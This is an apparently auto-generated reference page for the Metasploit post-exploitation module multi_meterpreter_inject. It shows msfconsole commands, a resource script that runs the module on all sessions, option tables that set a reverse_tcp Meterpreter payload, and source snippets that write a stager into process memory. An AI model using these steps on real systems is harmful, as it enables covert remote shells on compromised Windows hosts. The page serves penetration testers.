Windows Manage Inject in Memory Multiple Payloads - Metasploit


This page contains detailed information about how to use the post/windows/manage/multi_meterpreter_inject metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Manage Inject in Memory Multiple Payloads
Module: post/windows/manage/multi_meterpreter_inject
Source code: modules/post/windows/manage/multi_meterpreter_inject.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module will inject in to several processes a given payload and connecting to a given list of IP Addresses. The module works with a given lists of IP Addresses and process PIDs if no PID is given it will start a the given process in the advanced options and inject the selected payload in to the memory of the created module.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/manage/multi_meterpreter_inject

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/manage/multi_meterpreter_inject
msf post(multi_meterpreter_inject) > show options
    ... show and set options ...
msf post(multi_meterpreter_inject) > set SESSION session-id
msf post(multi_meterpreter_inject) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/manage/multi_meterpreter_inject")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the windows/manage/multi_meterpreter_inject post exploitation module looks in the msfconsole:

msf6 > use post/windows/manage/multi_meterpreter_inject

[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 post(windows/manage/multi_meterpreter_inject) > show info

       Name: Windows Manage Inject in Memory Multiple Payloads
     Module: post/windows/manage/multi_meterpreter_inject
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Carlos Perez <[email protected]>
  David Kennedy "ReL1K" <[email protected]>

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting                  Required  Description
  ----     ---------------                  --------  -----------
  AMOUNT   1                                no        Select the amount of shells you want to spawn.
  HANDLER  false                            no        Start new exploit/multi/handler job on local box.
  IPLIST   192.168.204.3                    yes       List of semicolon separated IP list.
  LPORT    4444                             no        Port number for the payload LPORT variable.
  PAYLOAD  windows/meterpreter/reverse_tcp  no        Payload to inject in to process memory
  PIDLIST                                   no        List of semicolon separated PID list.
  SESSION                                   yes       The session to run this module on.

Description:
  This module will inject in to several processes a given payload and 
  connecting to a given list of IP Addresses. The module works with a 
  given lists of IP Addresses and process PIDs if no PID is given it 
  will start a the given process in the advanced options and inject 
  the selected payload in to the memory of the created module.

Module Options


This is a complete list of options available in the windows/manage/multi_meterpreter_inject post exploitation module:

msf6 post(windows/manage/multi_meterpreter_inject) > show options

Module options (post/windows/manage/multi_meterpreter_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   AMOUNT   1                                no        Select the amount of shells you want to spawn.
   HANDLER  false                            no        Start new exploit/multi/handler job on local box.
   IPLIST   192.168.204.3                    yes       List of semicolon separated IP list.
   LPORT    4444                             no        Port number for the payload LPORT variable.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Payload to inject in to process memory
   PIDLIST                                   no        List of semicolon separated PID list.
   SESSION                                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/manage/multi_meterpreter_inject post exploitation module:

msf6 post(windows/manage/multi_meterpreter_inject) > show advanced

Module advanced options (post/windows/manage/multi_meterpreter_inject):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   PROCESSNAME  notepad.exe      no        Description
   VERBOSE      false            no        Enable detailed status messages
   WORKSPACE                     no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/manage/multi_meterpreter_inject module can do:

msf6 post(windows/manage/multi_meterpreter_inject) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/manage/multi_meterpreter_inject post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/manage/multi_meterpreter_inject) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

This module requires native Windows meterpreter functions not compatible with the selected session


Here is a relevant code snippet related to the "This module requires native Windows meterpreter functions not compatible with the selected session" error message:

47:	  end
48:	
49:	  # Run Method for when run command is issued
50:	  def run
51:	    unless session.platform == 'windows' && [ARCH_X64, ARCH_X86].include?(session.arch)
52:	      print_error("This module requires native Windows meterpreter functions not compatible with the selected session")
53:	      return
54:	    end
55:	    # Set variables
56:	    multi_ip = nil
57:	    multi_pid = nil

Failed to Inject Payload to <TARGET_PID>!


Here is a relevant code snippet related to the "Failed to Inject Payload to <TARGET_PID>!" error message:

96:	      print_status("Writing the stager into memory...")
97:	      host_process.memory.write(mem, raw)
98:	      host_process.thread.create(mem, 0)
99:	      print_good("Successfully injected Meterpreter in to process: #{target_pid}")
100:	    rescue ::Exception => e
101:	      print_error("Failed to Inject Payload to #{target_pid}!")
102:	      print_error(e.message)
103:	    end
104:	  end
105:	
106:	  # Function for Creation of Connection Handler

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • Carlos Perez <carlos_perez[at]darkoperator.com>
  • David Kennedy "ReL1K" <kennedyd013[at]gmail.com>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.